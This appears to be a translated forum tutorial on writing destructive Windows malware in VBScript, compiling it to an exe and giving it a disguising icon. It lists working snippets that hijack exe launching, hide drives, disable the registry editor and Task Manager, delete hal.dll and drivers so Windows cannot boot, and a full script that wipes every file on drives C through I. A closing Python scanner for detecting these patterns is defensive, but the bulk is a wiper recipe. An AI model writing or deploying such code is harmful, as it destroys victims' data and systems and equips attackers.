The malware will be written in Visual Basic Script.
Then compiled into "exe" format.
Let's get started:
First, you need to be able to change the file extension, and that's where we'll start.
There are many ways, but I like this one.
Everyone should have a regular archiver, so we'll use it.
So, for example, create a text file called "Text Document".
Now find this text file in your archiver. In the archiver, you should see the following: "Text-based document.txt".
The ending "txt" is the file extension, and that is what you need to change: just as when you rename a folder or file, erase "txt" and type "mp3" in its place.
As a result, we get "Text document.mp3".
If everything is clear, and there are no questions to be raised about this, then let's move on.
Create a text document containing the following:
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"
Then, after saving the file, you need to change the file extension: instead of "txt", write "vbs".
The abbreviation "vbs" comes from the name of the programming language, "Visual Basic Script".
Here we have the first, simple, malicious program that swaps mouse buttons.
Now you need to compile (convert) it to the "exe" format using the program "Vbs2Exe", and set any icon using the icon grabber "IconToy".
And now information for those who do not intend to limit their capabilities to a banal exchange of mouse buttons.
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
The top three lines must always be present. The code follows them, and an explanation of each snippet appears in parentheses below it.
It is also possible to combine these or other malicious commands.
Code:
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(Prevents "EXE" files from being opened)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(disallow access to hard drives)
Code:
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
(The system file is deleted, after which Windows cannot boot. The system works until the first reboot.)
Code:
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
(removing drivers)
Code:
fso. deletefolder "ADDRESS", 1
(Deleting a folder. Example: fso. deletefolder "C:New folder", 1)
Code:
fso.deletefolder "C:*.*",1
(Deleting all folders on Disk c. You can set any address)
Code:
fso. deletefile "ADDRESS", 1
(Delete the file. Example: fso. deletefile " C:New Foldertext документ.txt", 1)
Code:
fso.deletefile "C:*.*",1
(Deleting all files on Disk c. You can set any address)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Blocks editing of the registry)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Disables the Task Manager)
Code:
s.run"rundll32 user32, SwapMouseButton"
(Exchange of mouse buttons)
Example:
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
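Seen from the defender's side, every command listed above leaves a distinctive string in the script itself. The following static triage scanner is an added example, not part of the original page: the rule names, weights and score thresholds are assumptions chosen for illustration, and both sample scripts are constructed (the first reuses lines exactly as they appear on this page).

```python
import re

# (rule name, weight, pattern). Patterns key on API and value names only,
# so they match whether or not the path separators survive in the text.
RULES = [
    ("error-suppression", 1, r"^\s*on\s+error\s+resume\s+next"),
    ("exe-handler-hijack", 5, r"regwrite.*exefile.*shell.*open.*command"),
    ("hide-drives", 5, r"regwrite.*policies.*explorer.*no(drives|viewondrive)"),
    ("disable-regedit", 5, r"regwrite.*disableregistrytools"),
    ("disable-taskmgr", 5, r"regwrite.*disabletaskmgr"),
    ("delete-under-windir", 5, r"delete(file|folder).*getspecialfolder"),
    ("wildcard-delete", 5, r'delete(file|folder)\s*\(?\s*"[^"]*\*'),
    ("swap-mouse", 2, r"swapmousebutton"),
]
COMPILED = [(n, w, re.compile(p, re.I)) for n, w, p in RULES]

def scan(text):
    """Return [(line_number, rule_name)] for every non-comment line that hits."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.strip().lower().startswith(("'", "rem ")):
            continue  # VBScript comment lines do not execute
        hits += [(no, name) for name, _, rx in COMPILED if rx.search(line)]
    return hits

def verdict(text):
    """Sum the weights of the distinct rules hit and bucket the score."""
    fired = {name for _, name in scan(text)}
    score = sum(w for n, w, _ in COMPILED if n in fired)
    return "high" if score >= 5 else "medium" if score >= 2 else "low"

# Constructed sample: lines copied as they appear on this page.
SAMPLE = r'''on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
fso.deletefile "C:*.*",1
s.run"rundll32 user32, SwapMouseButton"
'''
# Constructed benign script: one named temp file, wildcard only in a comment.
BENIGN = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
' old cleanup, disabled: fso.deletefile "C:*.*"
fso.DeleteFile "C:\Temp\report.tmp", True
'''

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, verdict(text), scan(text))
```

`On Error Resume Next` alone scores low because legitimate administration scripts use it too; the weight only adds up once it appears alongside policy writes or wildcard deletes.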